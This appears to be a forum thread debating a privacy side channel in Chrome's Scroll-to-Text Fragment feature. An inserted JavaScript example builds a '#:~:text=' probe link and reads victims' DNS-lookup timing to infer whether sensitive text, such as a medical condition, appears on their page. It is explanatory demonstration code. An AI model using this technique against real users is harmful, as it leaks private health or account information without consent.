The example that the security researcher gave seems moot: the same thing would happen if the employee simply scrolled down on the page manually, no? And we already have the ability to link to anchors on a page, and that's not considered to be a privacy issue. Can someone explain how this is actually a meaningful privacy issue?
Say you have a long page that lists “Pre-existing conditions” at the bottom, and near that section is also a unique image or other external asset. If you click on the link and cancer is in your list, the page will scroll and load the related assets instantly. Without cancer in your list, you’d only load those assets through human scroll, which would most likely look different timing-wise. Thus you can determine with high probability whether your target has cancer listed (if you have access to DNS records, as mentioned in the example, and the target is using a browser that delays offscreen asset loading - like this same latest Chrome).
Whereas anchors tend to be generic (#preexisting-conditions), this new scroll behavior can be used to create an existence check for any user-specific text on the page (in carefully crafted scenarios). There are probably other variations that could be devised on this concept, since it allows indirect page interaction that can bypass authorization walls (since the browser would transmit cookies normally and such).
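The side channel the two comments above describe, written out as an added example (this is not code from the thread or from any browser vendor). It assumes, as the comments do, that the page lazy-loads a uniquely hosted image next to the user-specific row, that the observer sees the victim's DNS lookups with timestamps, and that the link uses the `#:~:text=` Scroll-to-Text Fragment syntax; the hostnames, the 1-second threshold and the log entries are constructed for illustration.

```javascript
// Added example, not from the original thread. Models the text-fragment
// timing leak: attacker side builds the probe link, observer side reads
// the victim's DNS log and infers whether the browser scrolled on its own.
// Hostnames, threshold and log data below are constructed assumptions.

// 1. Build the probe URL: the page the victim is already authorised to
//    see, plus a text fragment naming the word whose presence is tested.
//    encodeURIComponent keeps commas/ampersands from being read as
//    fragment-directive syntax.
function buildProbeUrl(pageUrl, probeText) {
  return `${pageUrl}#:~:text=${encodeURIComponent(probeText)}`;
}

// 2. Classify one victim's DNS log. Entries are [msSinceCapture, hostname].
//    - asset host resolved within thresholdMs of the page host: the browser
//      jumped to the matching text itself, so the probe word is on the page
//    - asset host resolved much later: consistent with a human scrolling
//    - never resolved: the lazy-loaded asset never entered the viewport
function classifyDnsLog(entries, pageHost, assetHost, thresholdMs = 1000) {
  const page = entries.find(([, host]) => host === pageHost);
  if (!page) return 'no-visit';
  const asset = entries.find(
    ([t, host]) => host === assetHost && t >= page[0]
  );
  if (!asset) return 'not-loaded';
  return asset[0] - page[0] <= thresholdMs ? 'fragment-matched' : 'manual-scroll';
}

// Constructed sample logs (not real captures).
const PAGE_HOST = 'portal.example';
const ASSET_HOST = 'conditions-img.example'; // unique image beside the row

const victimA = [            // probe word present: browser scrolled at once
  [0, PAGE_HOST],
  [210, 'static.example'],
  [480, ASSET_HOST],
];
const victimB = [            // probe word absent: human scrolled 15 s later
  [0, PAGE_HOST],
  [220, 'static.example'],
  [14800, ASSET_HOST],
];
const victimC = [            // probe word absent: never scrolled that far
  [0, PAGE_HOST],
  [190, 'static.example'],
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(buildProbeUrl('https://portal.example/profile', 'cancer'));
  for (const [name, log] of [['A', victimA], ['B', victimB], ['C', victimC]]) {
    console.log(name, classifyDnsLog(log, PAGE_HOST, ASSET_HOST));
  }
}
```

The threshold is the weak point of the inference: it has to be tuned to the victim's network, and anything that loads the asset early (a short page, a fast human scroll, prefetching) collapses the two classes into one.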
This is absurdly difficult to pull off with very little payoff. You'd need to be sniffing the traffic of a network. Then craft a URL that contains a unique image near your text fragment query. Then somehow send that URL to the victims on your network. _Then_ check how long it takes for them to load that image upon clicking the URL.
I'd like to call myself a privacy advocate, but this is just absurd. The pros obviously outweigh the con of a very precise and targeted attack that leaks a predetermined bit of information.
If you've got their DNS records, you've already violated plenty of their privacy to get the information you want. No need for this text fragment "attack."
>I'd like to call myself a privacy advocate, but this is just absurd.
Yeah, my read of this is that it has nothing to do with privacy, people who want to block change for some reason have just learned that "I have privacy concerns about Google" is a catchword that will get you some press coverage, and are essentially hijacking the actually valid and important privacy concerns to push forward their unrelated opinions (and promote their browser product).
FF is considering implementing something in this space, yes. Note that there are at least two proposals for how this could work: one that is already deployed via a polyfill on various sites and the Google one. They have various functionality tradeoffs, and unfortunately Google decided to make up a wholly new thing instead of improving the existing thing...
This would behave differently if the browser's user is following @user than otherwise.
This convinced me not to dismiss the issue.
I'm not sure how that leaks over a side channel.
But I am sure there are governments who take active measures to shape the Internet to their liking - and Twitter has played a significant role in the past inside countries governed by them to oppose these governments.